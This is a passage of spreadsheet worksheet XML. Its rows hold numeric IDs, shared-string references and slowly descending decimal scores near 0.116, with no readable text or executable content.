        <v>4878</v>
      </c>
      <c r="F6487" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6488" ht="15.75" customHeight="1">
      <c r="A6488" s="1">
        <v>23043.0</v>
      </c>
      <c r="B6488" s="2">
        <v>5016855.0</v>
      </c>
      <c r="C6488" s="2" t="s">
        <v>6176</v>
      </c>
      <c r="D6488" s="2">
        <v>1.0</v>
      </c>
      <c r="E6488" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6488" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6489" ht="15.75" customHeight="1">
      <c r="A6489" s="1">
        <v>23760.0</v>
      </c>
      <c r="B6489" s="2">
        <v>7503360.0</v>
      </c>
      <c r="C6489" s="2" t="s">
        <v>6177</v>
      </c>
      <c r="D6489" s="2">
        <v>1.0</v>
      </c>
      <c r="E6489" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6489" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6490" ht="15.75" customHeight="1">
      <c r="A6490" s="1">
        <v>23812.0</v>
      </c>
      <c r="B6490" s="2">
        <v>7944160.0</v>
      </c>
      <c r="C6490" s="2" t="s">
        <v>6178</v>
      </c>
      <c r="D6490" s="2">
        <v>1.0</v>
      </c>
      <c r="E6490" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6490" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6491" ht="15.75" customHeight="1">
      <c r="A6491" s="1">
        <v>23960.0</v>
      </c>
      <c r="B6491" s="2">
        <v>9010115.0</v>
      </c>
      <c r="C6491" s="2" t="s">
        <v>6179</v>
      </c>
      <c r="D6491" s="2">
        <v>1.0</v>
      </c>
      <c r="E6491" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6491" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6492" ht="15.75" customHeight="1">
      <c r="A6492" s="1">
        <v>24383.0</v>
      </c>
      <c r="B6492" s="2">
        <v>1.0777091E7</v>
      </c>
      <c r="C6492" s="2" t="s">
        <v>6180</v>
      </c>
      <c r="D6492" s="2">
        <v>1.0</v>
      </c>
      <c r="E6492" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6492" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6493" ht="15.75" customHeight="1">
      <c r="A6493" s="1">
        <v>24580.0</v>
      </c>
      <c r="B6493" s="2">
        <v>1.1328985E7</v>
      </c>
      <c r="C6493" s="2" t="s">
        <v>6181</v>
      </c>
      <c r="D6493" s="2">
        <v>1.0</v>
      </c>
      <c r="E6493" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6493" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6494" ht="15.75" customHeight="1">
      <c r="A6494" s="1">
        <v>25273.0</v>
      </c>
      <c r="B6494" s="2">
        <v>1.3394859E7</v>
      </c>
      <c r="C6494" s="2" t="s">
        <v>6182</v>
      </c>
      <c r="D6494" s="2">
        <v>1.0</v>
      </c>
      <c r="E6494" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6494" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6495" ht="15.75" customHeight="1">
      <c r="A6495" s="1">
        <v>26176.0</v>
      </c>
      <c r="B6495" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C6495" s="2" t="s">
        <v>6183</v>
      </c>
      <c r="D6495" s="2">
        <v>1.0</v>
      </c>
      <c r="E6495" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6495" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6496" ht="15.75" customHeight="1">
      <c r="A6496" s="1">
        <v>26207.0</v>
      </c>
      <c r="B6496" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C6496" s="2" t="s">
        <v>6184</v>
      </c>
      <c r="D6496" s="2">
        <v>1.0</v>
      </c>
      <c r="E6496" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6496" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6497" ht="15.75" customHeight="1">
      <c r="A6497" s="1">
        <v>27186.0</v>
      </c>
      <c r="B6497" s="2">
        <v>2.088285E7</v>
      </c>
      <c r="C6497" s="2" t="s">
        <v>6185</v>
      </c>
      <c r="D6497" s="2">
        <v>1.0</v>
      </c>
      <c r="E6497" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6497" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6498" ht="15.75" customHeight="1">
      <c r="A6498" s="1">
        <v>27288.0</v>
      </c>
      <c r="B6498" s="2">
        <v>2.1239261E7</v>
      </c>
      <c r="C6498" s="2" t="s">
        <v>6186</v>
      </c>
      <c r="D6498" s="2">
        <v>1.0</v>
      </c>
      <c r="E6498" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6498" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6499" ht="15.75" customHeight="1">
      <c r="A6499" s="1">
        <v>28428.0</v>
      </c>
      <c r="B6499" s="2">
        <v>2.6424334E7</v>
      </c>
      <c r="C6499" s="2" t="s">
        <v>6187</v>
      </c>
      <c r="D6499" s="2">
        <v>1.0</v>
      </c>
      <c r="E6499" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6499" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6500" ht="15.75" customHeight="1">
      <c r="A6500" s="1">
        <v>28648.0</v>
      </c>
      <c r="B6500" s="2">
        <v>2.7322414E7</v>
      </c>
      <c r="C6500" s="2" t="s">
        <v>6188</v>
      </c>
      <c r="D6500" s="2">
        <v>1.0</v>
      </c>
      <c r="E6500" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6500" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6501" ht="15.75" customHeight="1">
      <c r="A6501" s="1">
        <v>28723.0</v>
      </c>
      <c r="B6501" s="2">
        <v>2.7918738E7</v>
      </c>
      <c r="C6501" s="2" t="s">
        <v>6189</v>
      </c>
      <c r="D6501" s="2">
        <v>1.0</v>
      </c>
      <c r="E6501" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6501" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6502" ht="15.75" customHeight="1">
      <c r="A6502" s="1">
        <v>29295.0</v>
      </c>
      <c r="B6502" s="2">
        <v>3.1201294E7</v>
      </c>
      <c r="C6502" s="2" t="s">
        <v>6190</v>
      </c>
      <c r="D6502" s="2">
        <v>1.0</v>
      </c>
      <c r="E6502" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6502" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6503" ht="15.75" customHeight="1">
      <c r="A6503" s="1">
        <v>29307.0</v>
      </c>
      <c r="B6503" s="2">
        <v>3.1272332E7</v>
      </c>
      <c r="C6503" s="2" t="s">
        <v>6172</v>
      </c>
      <c r="D6503" s="2">
        <v>1.0</v>
      </c>
      <c r="E6503" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6503" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6504" ht="15.75" customHeight="1">
      <c r="A6504" s="1">
        <v>29621.0</v>
      </c>
      <c r="B6504" s="2">
        <v>3.3653585E7</v>
      </c>
      <c r="C6504" s="2" t="s">
        <v>6191</v>
      </c>
      <c r="D6504" s="2">
        <v>1.0</v>
      </c>
      <c r="E6504" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6504" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6505" ht="15.75" customHeight="1">
      <c r="A6505" s="1">
        <v>29631.0</v>
      </c>
      <c r="B6505" s="2">
        <v>3.3714432E7</v>
      </c>
      <c r="C6505" s="2" t="s">
        <v>6192</v>
      </c>
      <c r="D6505" s="2">
        <v>1.0</v>
      </c>
      <c r="E6505" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6505" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6506" ht="15.75" customHeight="1">
      <c r="A6506" s="1">
        <v>29842.0</v>
      </c>
      <c r="B6506" s="2">
        <v>3.5616594E7</v>
      </c>
      <c r="C6506" s="2" t="s">
        <v>6193</v>
      </c>
      <c r="D6506" s="2">
        <v>1.0</v>
      </c>
      <c r="E6506" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6506" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6507" ht="15.75" customHeight="1">
      <c r="A6507" s="1">
        <v>30600.0</v>
      </c>
      <c r="B6507" s="2">
        <v>4133664.0</v>
      </c>
      <c r="C6507" s="2" t="s">
        <v>6194</v>
      </c>
      <c r="D6507" s="2">
        <v>1.0</v>
      </c>
      <c r="E6507" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6507" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6508" ht="15.75" customHeight="1">
      <c r="A6508" s="1">
        <v>30797.0</v>
      </c>
      <c r="B6508" s="2">
        <v>4.5216853E7</v>
      </c>
      <c r="C6508" s="2" t="s">
        <v>6195</v>
      </c>
      <c r="D6508" s="2">
        <v>1.0</v>
      </c>
      <c r="E6508" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6508" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6509" ht="15.75" customHeight="1">
      <c r="A6509" s="1">
        <v>30846.0</v>
      </c>
      <c r="B6509" s="2">
        <v>4.5868039E7</v>
      </c>
      <c r="C6509" s="2" t="s">
        <v>6196</v>
      </c>
      <c r="D6509" s="2">
        <v>1.0</v>
      </c>
      <c r="E6509" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6509" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6510" ht="15.75" customHeight="1">
      <c r="A6510" s="1">
        <v>30938.0</v>
      </c>
      <c r="B6510" s="2">
        <v>4.7252711E7</v>
      </c>
      <c r="C6510" s="2" t="s">
        <v>6173</v>
      </c>
      <c r="D6510" s="2">
        <v>1.0</v>
      </c>
      <c r="E6510" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6510" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6511" ht="15.75" customHeight="1">
      <c r="A6511" s="1">
        <v>31283.0</v>
      </c>
      <c r="B6511" s="2">
        <v>4.9611458E7</v>
      </c>
      <c r="C6511" s="2" t="s">
        <v>6197</v>
      </c>
      <c r="D6511" s="2">
        <v>1.0</v>
      </c>
      <c r="E6511" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6511" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6512" ht="15.75" customHeight="1">
      <c r="A6512" s="1">
        <v>31356.0</v>
      </c>
      <c r="B6512" s="2">
        <v>4986311.0</v>
      </c>
      <c r="C6512" s="2" t="s">
        <v>6198</v>
      </c>
      <c r="D6512" s="2">
        <v>1.0</v>
      </c>
      <c r="E6512" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6512" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6513" ht="15.75" customHeight="1">
      <c r="A6513" s="1">
        <v>32129.0</v>
      </c>
      <c r="B6513" s="2">
        <v>5.4113315E7</v>
      </c>
      <c r="C6513" s="2" t="s">
        <v>6199</v>
      </c>
      <c r="D6513" s="2">
        <v>1.0</v>
      </c>
      <c r="E6513" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6513" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6514" ht="15.75" customHeight="1">
      <c r="A6514" s="1">
        <v>32584.0</v>
      </c>
      <c r="B6514" s="2">
        <v>5783602.0</v>
      </c>
      <c r="C6514" s="2" t="s">
        <v>6200</v>
      </c>
      <c r="D6514" s="2">
        <v>1.0</v>
      </c>
      <c r="E6514" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6514" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6515" ht="15.75" customHeight="1">
      <c r="A6515" s="1">
        <v>12840.0</v>
      </c>
      <c r="B6515" s="2">
        <v>3.1756776E7</v>
      </c>
      <c r="C6515" s="2" t="s">
        <v>6201</v>
      </c>
      <c r="D6515" s="2">
        <v>1.0</v>
      </c>
      <c r="E6515" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6515" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="6516" ht="15.75" customHeight="1">
      <c r="A6516" s="1">
        <v>22164.0</v>
      </c>
      <c r="B6516" s="2">
        <v>3.1495817E7</v>
      </c>
      <c r="C6516" s="2" t="s">
        <v>6202</v>
      </c>
      <c r="D6516" s="2">
        <v>1.0</v>
      </c>
      <c r="E6516" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6516" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="6517" ht="15.75" customHeight="1">
      <c r="A6517" s="1">
        <v>24403.0</v>
      </c>
      <c r="B6517" s="2">
        <v>1.0814889E7</v>
      </c>
      <c r="C6517" s="2" t="s">
        <v>6203</v>
      </c>
      <c r="D6517" s="2">
        <v>1.0</v>
      </c>
      <c r="E6517" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6517" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="6518" ht="15.75" customHeight="1">
      <c r="A6518" s="1">
        <v>33115.0</v>
      </c>
      <c r="B6518" s="2">
        <v>6973480.0</v>
      </c>
      <c r="C6518" s="2" t="s">
        <v>6204</v>
      </c>
      <c r="D6518" s="2">
        <v>1.0</v>
      </c>
      <c r="E6518" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6518" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="6519" ht="15.75" customHeight="1">
      <c r="A6519" s="1">
        <v>5522.0</v>
      </c>
      <c r="B6519" s="2">
        <v>4.5867438E7</v>
      </c>
      <c r="C6519" s="2" t="s">
        <v>6205</v>
      </c>
      <c r="D6519" s="2">
        <v>1.0</v>
      </c>
      <c r="E6519" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6519" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="6520" ht="15.75" customHeight="1">
      <c r="A6520" s="1">
        <v>25288.0</v>
      </c>
      <c r="B6520" s="2">
        <v>1.3400992E7</v>
      </c>
      <c r="C6520" s="2" t="s">
        <v>6206</v>
      </c>
      <c r="D6520" s="2">
        <v>1.0</v>
      </c>
      <c r="E6520" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6520" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="6521" ht="15.75" customHeight="1">
      <c r="A6521" s="1">
        <v>28180.0</v>
      </c>
      <c r="B6521" s="2">
        <v>2.4995342E7</v>
      </c>
      <c r="C6521" s="2" t="s">
        <v>6207</v>
      </c>
      <c r="D6521" s="2">
        <v>1.0</v>
      </c>
      <c r="E6521" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6521" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="6522" ht="15.75" customHeight="1">
      <c r="A6522" s="1">
        <v>23289.0</v>
      </c>
      <c r="B6522" s="2">
        <v>5379391.0</v>
      </c>
      <c r="C6522" s="2" t="s">
        <v>6208</v>
      </c>
      <c r="D6522" s="2">
        <v>1.0</v>
      </c>
      <c r="E6522" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6522" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="6523" ht="15.75" customHeight="1">
      <c r="A6523" s="1">
        <v>24859.0</v>
      </c>
      <c r="B6523" s="2">
        <v>1.2207463E7</v>
      </c>
      <c r="C6523" s="2" t="s">
        <v>6209</v>
      </c>
      <c r="D6523" s="2">
        <v>1.0</v>
      </c>
      <c r="E6523" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6523" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="6524" ht="15.75" customHeight="1">
      <c r="A6524" s="1">
        <v>32220.0</v>
      </c>
      <c r="B6524" s="2">
        <v>5488862.0</v>
      </c>
      <c r="C6524" s="2" t="s">
        <v>6210</v>
      </c>
      <c r="D6524" s="2">
        <v>1.0</v>
      </c>
      <c r="E6524" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6524" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="6525" ht="15.75" customHeight="1">
      <c r="A6525" s="1">
        <v>32871.0</v>
      </c>
      <c r="B6525" s="2">
        <v>6309094.0</v>
      </c>
      <c r="C6525" s="2" t="s">
        <v>6109</v>
      </c>
      <c r="D6525" s="2">
        <v>1.0</v>
      </c>
      <c r="E6525" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6525" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="6526" ht="15.75" customHeight="1">
      <c r="A6526" s="1">
        <v>33825.0</v>
      </c>
      <c r="B6526" s="2">
        <v>8921813.0</v>
      </c>
      <c r="C6526" s="2" t="s">
        <v>6211</v>
      </c>
      <c r="D6526" s="2">
        <v>1.0</v>
      </c>
      <c r="E6526" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6526" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="6527" ht="15.75" customHeight="1">
      <c r="A6527" s="1">
        <v>27744.0</v>
      </c>
      <c r="B6527" s="2">
        <v>2.3082224E7</v>
      </c>
      <c r="C6527" s="2" t="s">
        <v>6105</v>
      </c>
      <c r="D6527" s="2">
        <v>1.0</v>
      </c>
      <c r="E6527" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6527" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="6528" ht="15.75" customHeight="1">
      <c r="A6528" s="1">
        <v>32367.0</v>
      </c>
      <c r="B6528" s="2">
        <v>5598917.0</v>
      </c>
      <c r="C6528" s="2" t="s">
        <v>6212</v>
      </c>
      <c r="D6528" s="2">
        <v>1.0</v>
      </c>
      <c r="E6528" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6528" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="6529" ht="15.75" customHeight="1">
      <c r="A6529" s="1">
        <v>9488.0</v>
      </c>
      <c r="B6529" s="2">
        <v>5.5910675E7</v>
      </c>
      <c r="C6529" s="2" t="s">
        <v>6213</v>
      </c>
      <c r="D6529" s="2">
        <v>1.0</v>
      </c>
      <c r="E6529" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6529" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="6530" ht="15.75" customHeight="1">
      <c r="A6530" s="1">
        <v>24236.0</v>
      </c>
      <c r="B6530" s="2">
        <v>1.0463179E7</v>
      </c>
      <c r="C6530" s="2" t="s">
        <v>6214</v>
      </c>
      <c r="D6530" s="2">
        <v>1.0</v>
      </c>
      <c r="E6530" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6530" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="6531" ht="15.75" customHeight="1">
      <c r="A6531" s="1">
        <v>26820.0</v>
      </c>
      <c r="B6531" s="2">
        <v>1.877997E7</v>
      </c>
      <c r="C6531" s="2" t="s">
        <v>6215</v>
      </c>
      <c r="D6531" s="2">
        <v>1.0</v>
      </c>
      <c r="E6531" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6531" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="6532" ht="15.75" customHeight="1">
      <c r="A6532" s="1">
        <v>28062.0</v>
      </c>
      <c r="B6532" s="2">
        <v>2.457424E7</v>
      </c>
      <c r="C6532" s="2" t="s">
        <v>5958</v>
      </c>
      <c r="D6532" s="2">
        <v>1.0</v>
      </c>
      <c r="E6532" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6532" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="6533" ht="15.75" customHeight="1">
      <c r="A6533" s="1">
        <v>32086.0</v>
      </c>
      <c r="B6533" s="2">
        <v>5.3929309E7</v>
      </c>
      <c r="C6533" s="2" t="s">
        <v>6216</v>
      </c>
      <c r="D6533" s="2">
        <v>1.0</v>
      </c>
      <c r="E6533" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6533" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="6534" ht="15.75" customHeight="1">
      <c r="A6534" s="1">
        <v>32368.0</v>
      </c>
      <c r="B6534" s="2">
        <v>5599273.0</v>
      </c>
      <c r="C6534" s="2" t="s">
        <v>6217</v>
      </c>
      <c r="D6534" s="2">
        <v>1.0</v>
      </c>
      <c r="E6534" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6534" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="6535" ht="15.75" customHeight="1">
      <c r="A6535" s="1">
        <v>32588.0</v>
      </c>
      <c r="B6535" s="2">
        <v>5802568.0</v>
      </c>
      <c r="C6535" s="2" t="s">
        <v>6218</v>
      </c>
      <c r="D6535" s="2">
        <v>1.0</v>
      </c>
      <c r="E6535" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6535" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="6536" ht="15.75" customHeight="1">
      <c r="A6536" s="1">
        <v>32780.0</v>
      </c>
      <c r="B6536" s="2">
        <v>6119883.0</v>
      </c>
      <c r="C6536" s="2" t="s">
        <v>6219</v>
      </c>
      <c r="D6536" s="2">
        <v>1.0</v>
      </c>
      <c r="E6536" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6536" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="6537" ht="15.75" customHeight="1">
      <c r="A6537" s="1">
        <v>16798.0</v>
      </c>
      <c r="B6537" s="2">
        <v>4.7777989E7</v>
      </c>
      <c r="C6537" s="2" t="s">
        <v>6220</v>
      </c>
      <c r="D6537" s="2">
        <v>1.0</v>
      </c>
      <c r="E6537" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6537" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="6538" ht="15.75" customHeight="1">
      <c r="A6538" s="1">
        <v>23453.0</v>
      </c>
      <c r="B6538" s="2">
        <v>5689197.0</v>
      </c>
      <c r="C6538" s="2" t="s">
        <v>6221</v>
      </c>
      <c r="D6538" s="2">
        <v>1.0</v>
      </c>
      <c r="E6538" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6538" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="6539" ht="15.75" customHeight="1">
      <c r="A6539" s="1">
        <v>24187.0</v>
      </c>
      <c r="B6539" s="2">
        <v>1.0267494E7</v>
      </c>
      <c r="C6539" s="2" t="s">
        <v>6222</v>
      </c>
      <c r="D6539" s="2">
        <v>1.0</v>
      </c>
      <c r="E6539" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6539" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="6540" ht="15.75" customHeight="1">
      <c r="A6540" s="1">
        <v>20132.0</v>
      </c>
      <c r="B6540" s="2">
        <v>1.0079166E7</v>
      </c>
      <c r="C6540" s="2" t="s">
        <v>6223</v>
      </c>
      <c r="D6540" s="2">
        <v>1.0</v>
      </c>
      <c r="E6540" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6540" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="6541" ht="15.75" customHeight="1">
      <c r="A6541" s="1">
        <v>20748.0</v>
      </c>
      <c r="B6541" s="2">
        <v>1.4798955E7</v>
      </c>
      <c r="C6541" s="2" t="s">
        <v>6224</v>
      </c>
      <c r="D6541" s="2">
        <v>1.0</v>
      </c>
      <c r="E6541" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6541" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="6542" ht="15.75" customHeight="1">
      <c r="A6542" s="1">
        <v>30008.0</v>
      </c>
      <c r="B6542" s="2">
        <v>3.6153369E7</v>
      </c>
      <c r="C6542" s="2" t="s">
        <v>6225</v>
      </c>
      <c r="D6542" s="2">
        <v>1.0</v>
      </c>
      <c r="E6542" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6542" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="6543" ht="15.75" customHeight="1">
      <c r="A6543" s="1">
        <v>30837.0</v>
      </c>
      <c r="B6543" s="2">
        <v>4566664.0</v>
      </c>
      <c r="C6543" s="2" t="s">
        <v>6226</v>
      </c>
      <c r="D6543" s="2">
        <v>1.0</v>
      </c>
      <c r="E6543" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6543" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="6544" ht="15.75" customHeight="1">
      <c r="A6544" s="1">
        <v>16745.0</v>
      </c>
      <c r="B6544" s="2">
        <v>4.7568192E7</v>
      </c>
      <c r="C6544" s="2" t="s">
        <v>6227</v>
      </c>
      <c r="D6544" s="2">
        <v>1.0</v>
      </c>
      <c r="E6544" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6544" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="6545" ht="15.75" customHeight="1">
      <c r="A6545" s="1">
        <v>20655.0</v>
      </c>
      <c r="B6545" s="2">
        <v>1.4278001E7</v>
      </c>
      <c r="C6545" s="2" t="s">
        <v>6228</v>
      </c>
      <c r="D6545" s="2">
        <v>1.0</v>
      </c>
      <c r="E6545" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6545" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="6546" ht="15.75" customHeight="1">
      <c r="A6546" s="1">
        <v>25655.0</v>
      </c>
      <c r="B6546" s="2">
        <v>1.4523181E7</v>
      </c>
      <c r="C6546" s="2" t="s">
        <v>5988</v>
      </c>
      <c r="D6546" s="2">
        <v>1.0</v>
      </c>
      <c r="E6546" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6546" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="6547" ht="15.75" customHeight="1">
      <c r="A6547" s="1">
        <v>29075.0</v>
      </c>
      <c r="B6547" s="2">
        <v>3.0320592E7</v>
      </c>
      <c r="C6547" s="2" t="s">
        <v>6229</v>
      </c>
      <c r="D6547" s="2">
        <v>1.0</v>
      </c>
      <c r="E6547" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6547" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="6548" ht="15.75" customHeight="1">
      <c r="A6548" s="1">
        <v>31515.0</v>
      </c>
      <c r="B6548" s="2">
        <v>5078396.0</v>
      </c>
      <c r="C6548" s="2" t="s">
        <v>6230</v>
      </c>
      <c r="D6548" s="2">
        <v>1.0</v>
      </c>
      <c r="E6548" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6548" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="6549" ht="15.75" customHeight="1">
      <c r="A6549" s="1">
        <v>31667.0</v>
      </c>
      <c r="B6549" s="2">
        <v>5.1760264E7</v>
      </c>
      <c r="C6549" s="2" t="s">
        <v>6231</v>
      </c>
      <c r="D6549" s="2">
        <v>1.0</v>
      </c>
      <c r="E6549" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6549" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="6550" ht="15.75" customHeight="1">
      <c r="A6550" s="1">
        <v>5572.0</v>
      </c>
      <c r="B6550" s="2">
        <v>4.6023842E7</v>
      </c>
      <c r="C6550" s="2" t="s">
        <v>6232</v>
      </c>
      <c r="D6550" s="2">
        <v>1.0</v>
      </c>
      <c r="E6550" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6550" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="6551" ht="15.75" customHeight="1">
      <c r="A6551" s="1">
        <v>11845.0</v>
      </c>
      <c r="B6551" s="2">
        <v>2.4715438E7</v>
      </c>
      <c r="C6551" s="2" t="s">
        <v>6233</v>
      </c>
      <c r="D6551" s="2">
        <v>1.0</v>
      </c>
      <c r="E6551" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6551" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="6552" ht="15.75" customHeight="1">
      <c r="A6552" s="1">
        <v>19858.0</v>
      </c>
      <c r="B6552" s="2">
        <v>5.7151182E7</v>
      </c>
      <c r="C6552" s="2" t="s">
        <v>6234</v>
      </c>
      <c r="D6552" s="2">
        <v>1.0</v>
      </c>
      <c r="E6552" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6552" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="6553" ht="15.75" customHeight="1">
      <c r="A6553" s="1">
        <v>32440.0</v>
      </c>
      <c r="B6553" s="2">
        <v>5.6628071E7</v>
      </c>
      <c r="C6553" s="2" t="s">
        <v>6235</v>
      </c>
      <c r="D6553" s="2">
        <v>1.0</v>
      </c>
      <c r="E6553" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6553" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="6554" ht="15.75" customHeight="1">
      <c r="A6554" s="1">
        <v>33990.0</v>
      </c>
      <c r="B6554" s="2">
        <v>9410278.0</v>
      </c>
      <c r="C6554" s="2" t="s">
        <v>6236</v>
      </c>
      <c r="D6554" s="2">
        <v>1.0</v>
      </c>
      <c r="E6554" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6554" s="2">
